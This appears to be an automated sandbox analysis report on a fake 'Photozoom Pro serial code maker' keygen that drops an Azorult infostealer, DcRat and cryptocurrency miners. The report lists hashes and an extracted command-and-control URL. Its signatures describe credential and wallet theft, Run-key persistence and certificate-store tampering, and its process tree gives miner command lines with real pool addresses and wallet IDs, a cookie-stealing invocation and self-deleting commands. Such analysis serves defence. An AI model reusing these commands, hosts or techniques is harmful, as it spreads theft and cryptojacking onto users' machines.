Analysis
-
max time kernel
238s -
max time network
278s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
02-04-2021 05:02
Static task
static1
Behavioral task
behavioral1
Sample
Photozoom.Pro.5.5.0.2.v.5.0.2.serial.code.maker.exe
Resource
win10v20201028
Behavioral task
behavioral2
Sample
Photozoom.Pro.5.5.0.2.v.5.0.2.serial.code.maker.exe
Resource
win10v20201028
Behavioral task
behavioral3
Sample
Photozoom.Pro.5.5.0.2.v.5.0.2.serial.code.maker.exe
Resource
win10v20201028
Behavioral task
behavioral4
Sample
Photozoom.Pro.5.5.0.2.v.5.0.2.serial.code.maker.exe
Resource
win10v20201028
Behavioral task
behavioral5
Sample
Photozoom.Pro.5.5.0.2.v.5.0.2.serial.code.maker.exe
Resource
win7v20201028
General
-
Target
Photozoom.Pro.5.5.0.2.v.5.0.2.serial.code.maker.exe
-
Size
4.8MB
-
MD5
61e0e846e4a326fbe9f8cb873d644c6a
-
SHA1
a7fd6f5772d2a594972919743651c25309d7e622
-
SHA256
548af4c5f5e7897cca22f8f1629a06788d05c0ca9df90d4bc034a105ae5c875c
-
SHA512
2a064775995677be01ce0924431a8823dc767868ddf8a219cccf87af206f295868c7edb54e2304b84c9e50849438df5fa085081c1b5f277f3c405adbdeb5965c
Malware Config
Extracted
azorult
http://kvaka.li/1210776429.php
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
-
XMRig Miner Payload 4 IoCs
resource yara_rule behavioral2/memory/4384-74-0x00000001402CA898-mapping.dmp xmrig behavioral2/memory/4384-73-0x0000000140000000-0x000000014070A000-memory.dmp xmrig behavioral2/memory/4384-76-0x0000000140000000-0x000000014070A000-memory.dmp xmrig behavioral2/memory/4384-77-0x0000000140000000-0x000000014070A000-memory.dmp xmrig -
Blocklisted process makes network request 1 IoCs
flow pid Process 58 4384 msiexec.exe -
Executes dropped EXE 26 IoCs
pid Process 964 keygen-pr.exe 4252 keygen-step-1.exe 564 keygen-step-3.exe 4068 keygen-step-4.exe 1288 key.exe 1568 Setup.exe 2196 key.exe 2332 askinstall20.exe 4564 file.exe 3444 7FA5.tmp.exe 4204 8014.tmp.exe 3360 80C1.tmp.exe 4344 7FA5.tmp.exe 3992 md2_2efs.exe 1828 BTRSetp.exe 1708 2144307.exe 4272 8382643.exe 3400 516083.exe 2432 1457658.exe 3256 gcttt.exe 4020 Windows Host.exe 1172 jfiag3g_gg.exe 2520 jfiag3g_gg.exe 2068 516083.exe 496 516083.exe 4420 516083.exe -
resource yara_rule behavioral2/files/0x000100000001ab8a-156.dat upx behavioral2/files/0x000100000001ab8a-157.dat upx behavioral2/files/0x000200000001ab8c-173.dat upx behavioral2/files/0x000200000001ab8c-174.dat upx -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 4 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 8014.tmp.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\wwwupdat3 = "C:\\Users\\Admin\\AppData\\Roaming\\wwwupdat3.exe" 8014.tmp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.exe" gcttt.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Host = "C:\\ProgramData\\Windows Host\\Windows Host.exe" 8382643.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA md2_2efs.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 53 api.ipify.org 74 ip-api.com -
Suspicious use of SetThreadContext 5 IoCs
description pid Process procid_target PID 1288 set thread context of 2196 1288 key.exe 89 PID 4204 set thread context of 2576 4204 8014.tmp.exe 102 PID 3444 set thread context of 4344 3444 7FA5.tmp.exe 104 PID 4204 set thread context of 4384 4204 8014.tmp.exe 105 PID 3400 set thread context of 4420 3400 516083.exe 125 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 7FA5.tmp.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 7FA5.tmp.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 4816 timeout.exe -
Kills process with taskkill 1 IoCs
pid Process 1724 taskkill.exe -
Modifies data under HKEY_USERS 1 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\PegasPc file.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 askinstall20.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800000f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e askinstall20.exe -
Runs ping.exe 1 TTPs 2 IoCs
pid Process 2244 PING.EXE 4076 PING.EXE -
Suspicious behavior: EnumeratesProcesses 30 IoCs
pid Process 1288 key.exe 1288 key.exe 4564 file.exe 4564 file.exe 4344 7FA5.tmp.exe 4344 7FA5.tmp.exe 4564 file.exe 4564 file.exe 4564 file.exe 4564 file.exe 4564 file.exe 4564 file.exe 1708 2144307.exe 1708 2144307.exe 2432 1457658.exe 2520 jfiag3g_gg.exe 2520 jfiag3g_gg.exe 3400 516083.exe 3400 516083.exe 3400 516083.exe 3400 516083.exe 4420 516083.exe 2064 chrome.exe 2064 chrome.exe 2356 chrome.exe 2356 chrome.exe 4336 chrome.exe 4336 chrome.exe 432 chrome.exe 432 chrome.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1568 Setup.exe Token: SeCreateTokenPrivilege 2332 askinstall20.exe Token: SeAssignPrimaryTokenPrivilege 2332 askinstall20.exe Token: SeLockMemoryPrivilege 2332 askinstall20.exe Token: SeIncreaseQuotaPrivilege 2332 askinstall20.exe Token: SeMachineAccountPrivilege 2332 askinstall20.exe Token: SeTcbPrivilege 2332 askinstall20.exe Token: SeSecurityPrivilege 2332 askinstall20.exe Token: SeTakeOwnershipPrivilege 2332 askinstall20.exe Token: SeLoadDriverPrivilege 2332 askinstall20.exe Token: SeSystemProfilePrivilege 2332 askinstall20.exe Token: SeSystemtimePrivilege 2332 askinstall20.exe Token: SeProfSingleProcessPrivilege 2332 askinstall20.exe Token: SeIncBasePriorityPrivilege 2332 askinstall20.exe Token: SeCreatePagefilePrivilege 2332 askinstall20.exe Token: SeCreatePermanentPrivilege 2332 askinstall20.exe Token: SeBackupPrivilege 2332 askinstall20.exe Token: SeRestorePrivilege 2332 askinstall20.exe Token: SeShutdownPrivilege 2332 askinstall20.exe Token: SeDebugPrivilege 2332 askinstall20.exe Token: SeAuditPrivilege 2332 askinstall20.exe Token: SeSystemEnvironmentPrivilege 2332 askinstall20.exe Token: SeChangeNotifyPrivilege 2332 askinstall20.exe Token: SeRemoteShutdownPrivilege 2332 askinstall20.exe Token: SeUndockPrivilege 2332 askinstall20.exe Token: SeSyncAgentPrivilege 2332 askinstall20.exe Token: SeEnableDelegationPrivilege 2332 askinstall20.exe Token: SeManageVolumePrivilege 2332 askinstall20.exe Token: SeImpersonatePrivilege 2332 askinstall20.exe Token: SeCreateGlobalPrivilege 2332 askinstall20.exe Token: 31 2332 askinstall20.exe Token: 32 2332 askinstall20.exe Token: 33 2332 askinstall20.exe Token: 34 2332 askinstall20.exe Token: 35 2332 askinstall20.exe Token: SeDebugPrivilege 1724 taskkill.exe Token: SeImpersonatePrivilege 1288 key.exe Token: SeTcbPrivilege 1288 key.exe Token: SeChangeNotifyPrivilege 1288 key.exe Token: SeCreateTokenPrivilege 1288 key.exe Token: SeBackupPrivilege 1288 key.exe Token: SeRestorePrivilege 1288 key.exe Token: SeIncreaseQuotaPrivilege 1288 key.exe Token: SeAssignPrimaryTokenPrivilege 1288 key.exe Token: SeImpersonatePrivilege 1288 key.exe Token: SeTcbPrivilege 1288 key.exe Token: SeChangeNotifyPrivilege 1288 key.exe Token: SeCreateTokenPrivilege 1288 key.exe Token: SeBackupPrivilege 1288 key.exe Token: SeRestorePrivilege 1288 key.exe Token: SeIncreaseQuotaPrivilege 1288 key.exe Token: SeAssignPrimaryTokenPrivilege 1288 key.exe Token: SeImpersonatePrivilege 1288 key.exe Token: SeTcbPrivilege 1288 key.exe Token: SeChangeNotifyPrivilege 1288 key.exe Token: SeCreateTokenPrivilege 1288 key.exe Token: SeBackupPrivilege 1288 key.exe Token: SeRestorePrivilege 1288 key.exe Token: SeIncreaseQuotaPrivilege 1288 key.exe Token: SeAssignPrimaryTokenPrivilege 1288 key.exe Token: SeImpersonatePrivilege 1288 key.exe Token: SeTcbPrivilege 1288 key.exe Token: SeChangeNotifyPrivilege 1288 key.exe Token: SeCreateTokenPrivilege 1288 key.exe -
Suspicious use of FindShellTrayWindow 4 IoCs
pid Process 2356 chrome.exe 2356 chrome.exe 2356 chrome.exe 2356 chrome.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4704 wrote to memory of 4164 4704 Photozoom.Pro.5.5.0.2.v.5.0.2.serial.code.maker.exe 78 PID 4704 wrote to memory of 4164 4704 Photozoom.Pro.5.5.0.2.v.5.0.2.serial.code.maker.exe 78 PID 4704 wrote to memory of 4164 4704 Photozoom.Pro.5.5.0.2.v.5.0.2.serial.code.maker.exe 78 PID 4164 wrote to memory of 964 4164 cmd.exe 81 PID 4164 wrote to memory of 964 4164 cmd.exe 81 PID 4164 wrote to memory of 964 4164 cmd.exe 81 PID 4164 wrote to memory of 4252 4164 cmd.exe 82 PID 4164 wrote to memory of 4252 4164 cmd.exe 82 PID 4164 wrote to memory of 4252 4164 cmd.exe 82 PID 4164 wrote to memory of 564 4164 cmd.exe 83 PID 4164 wrote to memory of 564 4164 cmd.exe 83 PID 4164 wrote to memory of 564 4164 cmd.exe 83 PID 4164 wrote to memory of 4068 4164 cmd.exe 84 PID 4164 wrote to memory of 4068 4164 cmd.exe 84 PID 4164 wrote to memory of 4068 4164 cmd.exe 84 PID 964 wrote to memory of 1288 964 keygen-pr.exe 85 PID 964 wrote to memory of 1288 964 keygen-pr.exe 85 PID 964 wrote to memory of 1288 964 keygen-pr.exe 85 PID 4068 wrote to memory of 1568 4068 keygen-step-4.exe 86 PID 4068 wrote to memory of 1568 4068 keygen-step-4.exe 86 PID 564 wrote to memory of 1896 564 keygen-step-3.exe 87 PID 564 wrote to memory of 1896 564 keygen-step-3.exe 87 PID 564 wrote to memory of 1896 564 keygen-step-3.exe 87 PID 1288 wrote to memory of 2196 1288 key.exe 89 PID 1288 wrote to memory of 2196 1288 key.exe 89 PID 1288 wrote to memory of 2196 1288 key.exe 89 PID 1288 wrote to memory of 2196 1288 key.exe 89 PID 1288 wrote to memory of 2196 1288 key.exe 89 PID 1288 wrote to memory of 2196 1288 key.exe 89 PID 1288 wrote to memory of 2196 1288 key.exe 89 PID 1288 wrote to memory of 2196 1288 key.exe 89 PID 1288 wrote to memory of 2196 1288 key.exe 89 PID 1288 wrote to memory of 2196 1288 key.exe 89 PID 1288 wrote to memory of 2196 1288 key.exe 89 PID 1288 wrote to memory of 2196 1288 key.exe 89 PID 1288 wrote to memory of 2196 1288 key.exe 89 PID 1288 wrote to memory of 2196 1288 key.exe 89 PID 1288 wrote to memory of 2196 1288 key.exe 89 PID 1896 wrote to memory of 2244 1896 cmd.exe 90 PID 1896 wrote to memory of 2244 1896 cmd.exe 90 PID 1896 wrote to memory of 2244 1896 cmd.exe 90 PID 4068 wrote to memory of 2332 4068 keygen-step-4.exe 92 PID 4068 wrote to memory of 2332 4068 keygen-step-4.exe 92 PID 4068 wrote to memory of 2332 4068 keygen-step-4.exe 92 PID 2332 wrote to memory of 1416 2332 askinstall20.exe 94 PID 2332 wrote to memory of 1416 2332 askinstall20.exe 94 PID 2332 wrote to memory of 1416 2332 askinstall20.exe 94 PID 1416 wrote to memory of 1724 1416 cmd.exe 96 PID 1416 wrote to memory of 1724 1416 cmd.exe 96 PID 1416 wrote to memory of 1724 1416 cmd.exe 96 PID 4068 wrote to memory of 4564 4068 keygen-step-4.exe 98 PID 4068 wrote to memory of 4564 4068 keygen-step-4.exe 98 PID 4068 wrote to memory of 4564 4068 keygen-step-4.exe 98 PID 4564 wrote to memory of 3444 4564 file.exe 99 PID 4564 wrote to memory of 3444 4564 file.exe 99 PID 4564 wrote to memory of 3444 4564 file.exe 99 PID 4564 wrote to memory of 4204 4564 file.exe 100 PID 4564 wrote to memory of 4204 4564 file.exe 100 PID 4564 wrote to memory of 3360 4564 file.exe 101 PID 4564 wrote to memory of 3360 4564 file.exe 101 PID 4564 wrote to memory of 3360 4564 file.exe 101 PID 4204 wrote to memory of 2576 4204 8014.tmp.exe 102 PID 4204 wrote to memory of 2576 4204 8014.tmp.exe 102 PID 4204 wrote to memory of 2576 4204 8014.tmp.exe 102
Processes
-
C:\Users\Admin\AppData\Local\Temp\Photozoom.Pro.5.5.0.2.v.5.0.2.serial.code.maker.exe"C:\Users\Admin\AppData\Local\Temp\Photozoom.Pro.5.5.0.2.v.5.0.2.serial.code.maker.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4704 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:4164 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exekeygen-pr.exe -p83fsase3Ge3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:964 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1288 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exeC:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat5⤵
- Executes dropped EXE
PID:2196
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exekeygen-step-1.exe3⤵
- Executes dropped EXE
PID:4252
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exekeygen-step-3.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:564 -
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:1896 -
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 30005⤵
- Runs ping.exe
PID:2244
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exekeygen-step-4.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4068 -
C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1568
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"4⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2332 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe5⤵
- Suspicious use of WriteProcessMemory
PID:1416 -
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1724
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"4⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4564 -
C:\Users\Admin\AppData\Roaming\7FA5.tmp.exe"C:\Users\Admin\AppData\Roaming\7FA5.tmp.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3444 -
C:\Users\Admin\AppData\Roaming\7FA5.tmp.exe"C:\Users\Admin\AppData\Roaming\7FA5.tmp.exe"6⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:4344
-
-
-
C:\Users\Admin\AppData\Roaming\8014.tmp.exe"C:\Users\Admin\AppData\Roaming\8014.tmp.exe"5⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4204 -
C:\Windows\system32\msiexec.exe-P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.work@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 999996⤵PID:2576
-
-
C:\Windows\system32\msiexec.exe-o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8 --cpu-max-threads-hint 50 -r 99996⤵
- Blocklisted process makes network request
PID:4384
-
-
-
C:\Users\Admin\AppData\Roaming\80C1.tmp.exe"C:\Users\Admin\AppData\Roaming\80C1.tmp.exe"5⤵
- Executes dropped EXE
PID:3360 -
C:\Windows\SysWOW64\cmd.exe/c timeout /t 3 & del /f /q C:\Users\Admin\AppData\Roaming\80C1.tmp.exe6⤵PID:4372
-
C:\Windows\SysWOW64\timeout.exetimeout /t 37⤵
- Delays execution with timeout.exe
PID:4816
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"5⤵PID:1080
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.16⤵
- Runs ping.exe
PID:4076
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"4⤵
- Executes dropped EXE
- Checks whether UAC is enabled
PID:3992
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe"4⤵
- Executes dropped EXE
PID:1828 -
C:\ProgramData\2144307.exe"C:\ProgramData\2144307.exe"5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1708
-
-
C:\ProgramData\8382643.exe"C:\ProgramData\8382643.exe"5⤵
- Executes dropped EXE
- Adds Run key to start application
PID:4272 -
C:\ProgramData\Windows Host\Windows Host.exe"C:\ProgramData\Windows Host\Windows Host.exe"6⤵
- Executes dropped EXE
PID:4020
-
-
-
C:\ProgramData\516083.exe"C:\ProgramData\516083.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:3400 -
C:\ProgramData\516083.exe"{path}"6⤵
- Executes dropped EXE
PID:2068
-
-
C:\ProgramData\516083.exe"{path}"6⤵
- Executes dropped EXE
PID:496
-
-
C:\ProgramData\516083.exe"{path}"6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4420
-
-
-
C:\ProgramData\1457658.exe"C:\ProgramData\1457658.exe"5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2432
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
PID:3256 -
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
- Executes dropped EXE
PID:1172
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2520
-
-
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:2356 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xc8,0xcc,0xd0,0xa4,0xd4,0x7ff8628f6e00,0x7ff8628f6e10,0x7ff8628f6e202⤵PID:4800
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1540,1044482283680054582,17223212335561561147,131072 --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1592 /prefetch:22⤵PID:2420
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1540,1044482283680054582,17223212335561561147,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1648 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:2064
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1540,1044482283680054582,17223212335561561147,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2644 /prefetch:12⤵PID:4532
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1540,1044482283680054582,17223212335561561147,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2656 /prefetch:12⤵PID:4852
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1540,1044482283680054582,17223212335561561147,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3280 /prefetch:12⤵PID:480
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1540,1044482283680054582,17223212335561561147,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3416 /prefetch:12⤵PID:2780
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1540,1044482283680054582,17223212335561561147,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3672 /prefetch:12⤵PID:4204
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1540,1044482283680054582,17223212335561561147,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3632 /prefetch:12⤵PID:4680
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1540,1044482283680054582,17223212335561561147,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4108 /prefetch:82⤵PID:1112
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1540,1044482283680054582,17223212335561561147,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4240 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:4336
-
-
